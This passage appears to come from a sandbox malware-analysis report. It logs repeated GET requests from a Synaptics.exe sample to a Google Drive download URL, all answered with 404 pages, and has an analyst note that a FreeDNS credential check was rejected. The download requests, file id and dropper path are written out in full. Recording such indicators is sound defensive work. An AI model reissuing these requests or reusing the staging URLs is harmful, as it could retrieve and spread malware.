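Decoded, the FreeDNS reply is the single line "ERROR: Could not authenticate." to a getdyndns call carrying a 40-hex-character sha token, so the server rejected the credential the sample presents; the Google reply is a plain 141-byte (0x8d) 404 page for the Drive file id in the request. Neither fetch delivered content during the analysis, which is worth recording next to the indicators rather than assuming a payload was retrieved.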


| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 1 | 192.168.2.3 | 49766 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe |

Timestamp | kBytes transferred | Direction | Data
2022-01-26 01:40:41 UTC | 0 kB | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
2022-01-26 01:40:42 UTC | 1 kB | IN | HTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Content-Security-Policy: script-src 'nonce-MnbeCR+DLosHit1O26Q8ng' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Date: Wed, 26 Jan 2022 01:40:42 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:42 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Set-Cookie: NID=511=Z9NzJjnPWUitQLAoJHeuMMuo7U2KlbjEgRTwO6DBDzKkE9bNbTk7QrgaCNMw7qYQFNh3y6NAHppTjvVahiaNwwztWY1HVVfW-N_CaP8ut_6I2UiEdontaeBHy3IXTvLOy8WJyEVXH-OcRIRxCituWMrRoGdSseIThKXC76zDRX8; expires=Thu, 28-Jul-2022 01:40:41 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
2022-01-26 01:40:42 UTC | 3 kB | IN | Data Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
2022-01-26 01:40:42 UTC | 3 kB | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 10 | 192.168.2.3 | 49779 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe |

Timestamp | kBytes transferred | Direction | Data
2022-01-26 01:40:43 UTC | 16 kB | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
2022-01-26 01:40:43 UTC | 16 kB | IN | HTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Content-Security-Policy: script-src 'nonce-RdHp+ZvfKKgbks87zRU3qw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Date: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Set-Cookie: NID=511=myEvXuTvmjxcm4mnQp4ui8yq_pOmgMJXZ4qPt8sg5dP6BwW624u9fHxPm5SLfaDR1bn3DRtOVcQUmhGJb-8EKyJI7IqoDlJu-Yimrlw3LeFe0RflH1gxCzx21qwDBT5nfkHN9MrZplq9LIxFpB6oGRU1iePbOAj1ojcanT9iX_g; expires=Thu, 28-Jul-2022 01:40:43 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
2022-01-26 01:40:43 UTC | 17 kB | IN | Data Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
2022-01-26 01:40:43 UTC | 18 kB | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 11 | 192.168.2.3 | 49778 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe |

Timestamp | kBytes transferred | Direction | Data
2022-01-26 01:40:43 UTC | 16 kB | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
2022-01-26 01:40:43 UTC | 18 kB | IN | HTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Content-Security-Policy: script-src 'nonce-5xU30urGcRrPcxntL4QFLA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Date: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Set-Cookie: NID=511=IZ6IVToh4zcgc4x1sK0NAA7spP8dwoR3XdYssI9Pua_F_DpwrV1d7A2Lplg8ZiHtNOapGJdXunEw6OYhdWwZhh5BxFEnWLJm3lGH0S_UX5kgHKRMYqUNqOgw-QSKsMVLz69xPBGSBWDQ0g4zqPg2fWvSD6Mzlg5dqGcoGip1x00; expires=Thu, 28-Jul-2022 01:40:43 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  2022-01-26 01:40:43 UTC | 19 | IN | Data Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                  Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
                                                  2022-01-26 01:40:43 UTC | 19 | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                  12 | 192.168.2.3 | 49780 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
                                                  Timestamp | kBytes transferred | Direction | Data
                                                  2022-01-26 01:40:43 UTC | 19 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
                                                  2022-01-26 01:40:43 UTC | 21 | IN | HTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Content-Security-Policy: script-src 'nonce-sPLIUksRvialjFnyjQevTQ' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Date: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Set-Cookie: NID=511=WFRHPG-cDuXn9NqSuf0VuWUkAVPh5GdWWBMC9Ru1r6X6fT83oiT3knyYXEyjiVM_qb89t-XLdImlV-942jaLFcvX5D8TlLCmy87ko9TMEaSPrPNdarZ8TaE063oXe5MvEO7vd0XWYuVzSFICtzlQxwzQzt7o0ltS-HOTCTQepZI; expires=Thu, 28-Jul-2022 01:40:43 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  2022-01-26 01:40:43 UTC | 22 | IN | Data Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                  Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
                                                  2022-01-26 01:40:43 UTC | 22 | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                  13 | 192.168.2.3 | 49781 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
                                                  Timestamp | kBytes transferred | Direction | Data
                                                  2022-01-26 01:40:43 UTC | 19 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
                                                  2022-01-26 01:40:43 UTC | 19 | IN | HTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Content-Security-Policy: script-src 'nonce-vjtjcs1W4e/lOQ1cPPxnLQ' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Date: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:43 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Set-Cookie: NID=511=Vdgur68JofFWxSUhQckp8zV0Ef0ZTFKVUJ8d5I7w3wEVePra58Z4_uxGHewkEDv_U56WgYsIry6fzKCoIDq_XnVime8D9MZwNFwdrBRbEIFbenKPqF_DFmtRfk6NxThU8hv4EwxUkU88wcM1eVL3wKXNvecBnLUZFwUV5PX3e9Q; expires=Thu, 28-Jul-2022 01:40:43 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  2022-01-26 01:40:43 UTC | 21 | IN | Data Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                  Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
                                                  2022-01-26 01:40:43 UTC | 21 | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                  2 | 192.168.2.3 | 49771 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
                                                  Timestamp | kBytes transferred | Direction | Data
                                                  2022-01-26 01:40:42 UTC | 3 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
                                                  2022-01-26 01:40:42 UTC | 5 | IN | HTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Content-Security-Policy: script-src 'nonce-qUQ/asTtDE7He0Vml9HmZA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Date: Wed, 26 Jan 2022 01:40:42 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:42 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Set-Cookie: NID=511=GsvAX0t__-cMfTHedu1r9_YWhq8dTNOVby6k30MueLAVtOkLaQZHzdz00YyNq18rbdjPdyc0Y4iU6Kprz94a8dWdD6HYvujbvGXtTMbrJ3VWJ8_KcKALdwMx3u4pWl4yDWktspyOAhFbeHv2Cp3cvEGHz7ybCheljHi7wIYyQiw; expires=Thu, 28-Jul-2022 01:40:42 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  2022-01-26 01:40:42 UTC | 6 | IN | Data Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                  Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
                                                  2022-01-26 01:40:42 UTC | 6 | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                  3 | 192.168.2.3 | 49770 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
                                                  Timestamp | kBytes transferred | Direction | Data
                                                  2022-01-26 01:40:42 UTC | 3 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
                                                  2022-01-26 01:40:42 UTC | 3 | IN | HTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Content-Security-Policy: script-src 'nonce-YXDM5qvdo8b2sWEK1L9uVw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Date: Wed, 26 Jan 2022 01:40:42 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:42 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Set-Cookie: NID=511=ItB4rggOjE7L83nmMdJfyQhAXU45o48wqAdRB-lL5Ie-MdQjOv3okMid3WbfMDZHbnDZr5k9aqXXvSn4CBTAwHSyCdMEU1QFmYWvxj_Bxyqo2--MwRLKKn67BRFBYD59EXcasAatKWIUcsJscCR7xpunrw5_i7il4Vlwvg1bm0Y; expires=Thu, 28-Jul-2022 01:40:42 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  2022-01-26 01:40:42 UTC | 4 | IN | Data Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                  Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
                                                  2022-01-26 01:40:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                  4 | 192.168.2.3 | 49773 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
                                                  Timestamp | kBytes transferred | Direction | Data
                                                  2022-01-26 01:40:42 UTC | 6 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
                                                  2022-01-26 01:40:42 UTC | 6 | IN | HTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Content-Security-Policy: script-src 'nonce-RzI2vKOO/RcM9o2uC+wZFw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Date: Wed, 26 Jan 2022 01:40:42 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:42 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Set-Cookie: NID=511=oHsspnoaoRPvcVOBycmUhuol6EoOLvfMWKH14ADwtMfMkSbpD4McXBo-NIiw6WK2tPXLjhAxXrYi2j5Wwdpvid_dF8gzqeWxh1UK7pTsTjP_eApiv0c3T4yzPwYAKv1vSBfh3DOcMmuNNBAVV__pNTcD74huBhRy_r2KZ3mXhAA; expires=Thu, 28-Jul-2022 01:40:42 GMT; path=/; domain=.google.com; HttpOnly
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  2022-01-26 01:40:42 UTC | 8 | IN | Data Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                  Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
                                                  2022-01-26 01:40:42 UTC | 8 | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                  5 | 192.168.2.3 | 49772 | 142.250.186.46 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
                                                  Timestamp | kBytes transferred | Direction | Data
                                                  2022-01-26 01:40:42 UTC | 6 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                  User-Agent: Synaptics.exe
                                                  Host: docs.google.com
                                                  Cache-Control: no-cache
                                                  2022-01-26 01:40:42 UTC | 8 | IN | HTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Content-Security-Policy: script-src 'nonce-3MXOmncPcJvKr/WLBVs8Mw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Date: Wed, 26 Jan 2022 01:40:42 GMT
                                                  Expires: Wed, 26 Jan 2022 01:40:42 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
